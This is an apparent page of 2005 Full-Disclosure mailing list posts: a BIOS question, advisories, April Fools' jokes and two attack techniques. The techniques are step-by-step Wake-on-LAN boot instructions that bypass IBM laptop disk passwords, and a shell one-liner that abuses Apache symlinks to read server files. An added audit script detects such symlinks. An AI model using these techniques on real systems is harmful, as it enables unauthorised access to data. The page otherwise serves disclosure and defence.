Nick FitzGerald | 1 Apr 2005 02:01

Re: BIOS Hacking?

Gautam R. Singh wrote:

> Is there any way (software/program) to change the BootUp device order
> in the BIOS from the OS (Eg. Windows) itself?
> 
> While logged on to my Win2k I want to change my BIOS settings?

Boot-order settings are proprietary, so vary from BIOS vendor to BIOS 
vendor (and even possibly from version to version from the same 
vendor).  However, there is nothing special about what you want to do 
so long as the user running the utility (presumably supplied by your 
BIOS vendor _if_ such exists for your BIOS) has sufficiently high 
privileges.  Boot order (like all BIOS configuration options) is stored 
in CMOS and/or a fragment of Flash ROM used for EBCD so probably 
requires admin/system privs to alter (at least, to alter directly).

The laptop I'm writing this from has the capability to do what you ask, 
as do many others I've used.  This is achieved through vendor-supplied 
utilities in all cases I've looked at.  Such utilities seem much rarer 
(or at least, it is rare for them to be installed/supplied) on desktop 
boxes.  If you have a "cheap white box" style system you may well find 
a "mainboard utilities" disk amongst the various manuals and disks you 
probably never took out of the box, and usually this will include tools 
for altering the BIOS settings (and monitoring things like temperature, 
fan-speed, etc depending on your board) from inside the OS.  If you 
haven't such a disk, try searching around the websites of your 
mainboard and/or BIOS vendors.

Regards,


Sumy | 1 Apr 2005 02:20

(Paper) Programming: The Heart of Web Security

Information and data transmission system security holds a place of
ever-growing importance in today's world. The expansion of the Web has
provided businesses with an ideal platform for introducing and
promoting their products and services.

The Web is accessible to all, being both easy to use and widespread.
It frequently supplies the responsiveness necessary in today's
business environment. The emergence of portal sites, which bring
together professionals in a given sector or industry, provides an
essential tool for decision-making and communication among
partners....

Full Article: http://www.exploitx.com/forum/azbb.php?1111283551

-- 
http://www.outwartips.net
http://www.exploitx.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

KF (Lists | 1 Apr 2005 07:38

DMA[2005-0401a] - 'IVT BlueSoleil Directory Transversal'

DMA[2005-0401a] - 'IVT BlueSoleil Directory Transversal'
Author: Kevin Finisterre
Vendor: http://www.bluesoleil.com/products/index.asp, http://www.ivtcorporation.com/
Product: 'IVT BlueSoleil 1.4'
References: http://www.digitalmunition.com/DMA[2005-0103a].txt

Description: 
90% of the USB Bluetooth dongles you find on the market will come with drivers from 
Widcomm. Out of the 7 dongles I own only one does not use some flavor of Widcomm. My 
SMC Networks SMC-BT10 came with IVT BlueSoleil 1.4 software. 

BlueSoleil for Windows is a set of Bluetooth Application Profiles implemented on the
Windows platform. BlueSoleil is fully compliant with the Bluetooth SIG's latest 
specifications. It can enable PCs to form networks and exchange information wirelessly. 
It can also provide PC's a fast and reliable solution for effortless wireless connections 
to mobile phones, headsets, PDA's, Access Points, Printers, Digital Cameras, PC peripherals, 
etc. BlueSoleil supports more than ten Bluetooth chip-sets and different HCI interfaces 
which include USB, UART, PCMCIA and Compact Flash. 

My BlueSoleil install was performed on a Windows XP SP2 machine using the above mentioned 
SMC-BT10. I chose all program defaults during the install. Upon rebooting my machine the 
"Welcome to Bluetooth" screen was displayed and I was asked for a device name and type. I 
was told that my security level was set to 'Medium' and that other devices must provide a 
Bluetooth passkey before connecting with my computer. I was given the option to disable this 
security authentication by simply unchecking a box and clicking ok to continue. My PDA can 
be picky about using a pass key so I did go with 'Low' security. The BlueSoleil website 
mentioned that 'some old dongles my not support some operations' when dealing with using the 
key functions. This behavior could obviously prompt other users to set security to 'Low'. 

Georgi Guninski | 1 Apr 2005 08:57

openbsd 3.8 under GPL?

there are persistent rumors supported by check-ins on cvs.openbsd.org 
in private -GPL branch that openbsd 3.8 will be released under GPL.

analysts believe that theo accepting the fsf award for his contributions 
to GPL is just a part of the plot.

rumor says theo has said:
"definitely we can't build world without gcc. what the fuck is the 'G' in
gcc?
either we build a cc without 'G' so we can build world our way or we become
GPL."

-- 
where do you want bill gates to go today?


Dunceor . | 1 Apr 2005 09:01

Re: openbsd 3.8 under GPL?

I heard that Theo is actually hired by Red Hat and that the whole
OpenBSD project is gonna be bought by Red Hat.

On Apr 1, 2005 8:57 AM, Georgi Guninski <guninski <at> guninski.com> wrote:
> there are persistent rumors supported by check-ins on cvs.openbsd.org
> in private -GPL branch that openbsd 3.8 will be released under GPL.
> 
> analysts believe that theo accepting the fsf award for his contributions
> to GPL is just a part of the plot.
> 
> rumor says theo has said:
> "definitely we can't build world without gcc. what the fuck is the 'G' in
> gcc?
> either we build a cc without 'G' so we can build world our way or we become
> GPL."
> 
> --
> where do you want bill gates to go today?

Frank Bussink | 1 Apr 2005 09:26

IBM Laptop harddisk password bypass

A badly configured feature or a bug on most IBM laptops (T and X models) 
allows access to the hard disk without entering the password by 
using the WOL feature.
(Tested on T40, T41, T42, X24, X30, X40)

By default: WOL feature is on
By default: Network boot order contains CD-ROM
Most people enter the same BIOS and hard-disk password (as 2 different 
passwords is too much for most users)

Step-by-step
############

- Plug the power supply into the laptop
- Insert a bootable CD-ROM (not a DOS one, but for example a WinPE or a WINXP 
made with Bart)
- Plug in the network
- Open up the laptop without powering it up.

- Send from another computer a WOL packet (my tool for Win32 
http://frank.bussink.ch/download/wol.zip) with the MAC address of the 
laptop
- Don't touch a key
- After 90 seconds of waiting the laptop will boot from the CD-ROM
- So if the hard disk is not encrypted you can now access the hard-disk data!

For Security Administrators :
##########################
To secure the laptops, uncheck the WOL feature in the BIOS or if you need 

Martin Pitt | 1 Apr 2005 10:14

[USN-103-1] Linux kernel vulnerabilities

===========================================================
Ubuntu Security Notice USN-103-1	     April 01, 2005
linux-source-2.6.8.1 vulnerabilities
CAN-2005-0400, CAN-2005-0749, CAN-2005-0750, CAN-2005-0815,
CAN-2005-0839
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

linux-image-2.6.8.1-5-386
linux-image-2.6.8.1-5-686
linux-image-2.6.8.1-5-686-smp
linux-image-2.6.8.1-5-amd64-generic
linux-image-2.6.8.1-5-amd64-k8
linux-image-2.6.8.1-5-amd64-k8-smp
linux-image-2.6.8.1-5-amd64-xeon
linux-image-2.6.8.1-5-k7
linux-image-2.6.8.1-5-k7-smp
linux-image-2.6.8.1-5-power3
linux-image-2.6.8.1-5-power3-smp
linux-image-2.6.8.1-5-power4
linux-image-2.6.8.1-5-power4-smp
linux-image-2.6.8.1-5-powerpc
linux-image-2.6.8.1-5-powerpc-smp
linux-patch-debian-2.6.8.1


Sorral Bouddashiss | 1 Apr 2005 10:33

[hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.

------------------------------------------------
53cur17y 1ndu57ry [0nc3rn3d-p3r50n5 Pr353n7
[hr0n073rr0r15m - 7h3 J4ck50ff 7r14l.
------------------------------------------------

Gr3371ng5 f3ll0w hum4n5 w3lc0m3 70 7h3 y34r 3337,

0n 4 qu1ck pr3-4dv150ry n073 (4nd 7h1nk1ng 4b0u7 7h053 0f u5 wh0 d0n'7 f4ll 
1n70 7h3 c473g0ry 0f Hum4n): Wh47 w45 up w17h G0ld5731n 574lk1ng 7h3 57r3375,
4nd n0 d0ub7 7h3 m4l3 y0u7h, 0f B3rl1n 1n D3c3mb3r? 51[ 4g3n75 1n 7h3 f13ld
r3p0r7 h3 w45 533n r4mbl1ng 70 h1m53lf fr0m 4 p0d1um wh1l57 7h053 1n 7h3 
4ud13nc3 (w4171ng f0r B0b0 7h3 H4x0r cl0wn) w3r3 w4171ng 70 533 1f
3v3n7 53cur17y
w0uld 7r4nqu1l153 7h3 r4b1d b3457.

1n 07h3r n3w5:

17 h45 b33n br0ugh7 70 0ur 4773n710n 7h47 5k1ppy h45 f4ll3n d0wn 7h3 w3ll 
4nd L177l3 71mmy d035n'7 g1v3 4 5h17 45 h3 h45 4 n3w M1n1-M4c wh1ch 15 50 
57r1pp3d d0wn 7h47 17 c0m35 w17h0u7 4ny c0mp0n3n75 70 k33p c057 l0w, unl355
y0u 4r3 4 m3mb3r 0f 7h3 publ1c wh0 74lk5 4b0u7 17.

huh? cr4p 7h47 15n'7 m34n7 70 b3 r3l3453d f0r 12 m0n7h5?
50m30n3 c0uld h4v3 70ld m3! wh47 w17h 7h3 3x-3N 35 4Y (0bfuck473d 70 4nn0y 7h3m)
3mpl0y335 h4v1ng Ru5514n5 wr171ng plug1n5 f0r 7h31r 5h177y c0d3.

H44444ll000 D4v3.

574y1ng w17h 3N 35 4Y l1nk5 (0r lynx y0ur ch01c3) 
H45 4ny0n3 b33n n071c1ng h0w l0ckh33d m4r71n 15 51ph0n1ng H0glund5 1ll g07 ++'5 

Eduardo Tongson | 1 Apr 2005 10:48

Re: openbsd 3.8 under GPL?

> I heard that Theo is actually hired by Red Hat and that the whole
> OpenBSD project is gonna be bought by Red Hat.

It's april 1 or Theo and RMS are actually brothers. 

-- 
                                                    Eduardo Tongson     
                                                    <pornadmin.net/~tongson>

duper | 1 Apr 2005 11:19

Phun With Apache

#!/bin/sh
## Apache follows symbolic links referenced by public_html!
## Even when SymLinksifOwnerMatch is set and FollowSymLinks is not!
## A super-easy way to gain read access on files owned by the apache user!
ln -s /etc/httpd ~/public_html
lynx http://localhost/~duper/passwd

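A check an administrator could run against the behaviour this post describes, as an added example that is not part of the original post: it walks each user's public_html and reports symlinks that resolve outside that user's home or whose target has a different owner than the link. The function names, the output format and the one-directory-per-user layout under the base directory are assumptions.

```shell
#!/bin/sh
# Added example: audit per-user web directories for symlinks that escape
# the user's home. Assumes homes live directly under the given base
# directory and that readlink supports -f (GNU coreutils and most BSDs).

# Numeric owner of a path; pass -L first to get the owner of a link's target.
uid_of() { ls -ldn "$@" 2>/dev/null | awk '{print $3}'; }

# audit_userdirs BASE
# Prints one finding per line:
#   <user> <link> -> <resolved target> (link uid N, target uid M)
audit_userdirs() {
    base=$1
    for home in "$base"/*/; do
        home=${home%/}
        [ -d "$home" ] || continue
        user=${home##*/}
        pub=$home/public_html
        [ -e "$pub" ] || [ -L "$pub" ] || continue
        real_home=$(readlink -f "$home")
        # find does not follow symlinks by default, so a public_html that
        # is itself a link (the case in the post) is listed as well.
        find "$pub" -type l -print 2>/dev/null |
        while IFS= read -r link; do
            target=$(readlink -f "$link" 2>/dev/null) || target=unresolvable
            inside=no
            case $target in
                "$real_home"|"$real_home"/*) inside=yes ;;
            esac
            luid=$(uid_of "$link")
            tuid=$(uid_of -L "$link")
            # Report links leaving the home, and links whose target owner
            # differs from the link owner (what SymLinksIfOwnerMatch tests).
            if [ "$inside" = no ] || [ "$luid" != "${tuid:-$luid}" ]; then
                printf '%s %s -> %s (link uid %s, target uid %s)\n' \
                    "$user" "$link" "$target" "$luid" "${tuid:-?}"
            fi
        done
    done
}
```

Run it as `audit_userdirs /home` from a scheduled job; file names containing newlines are not handled.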
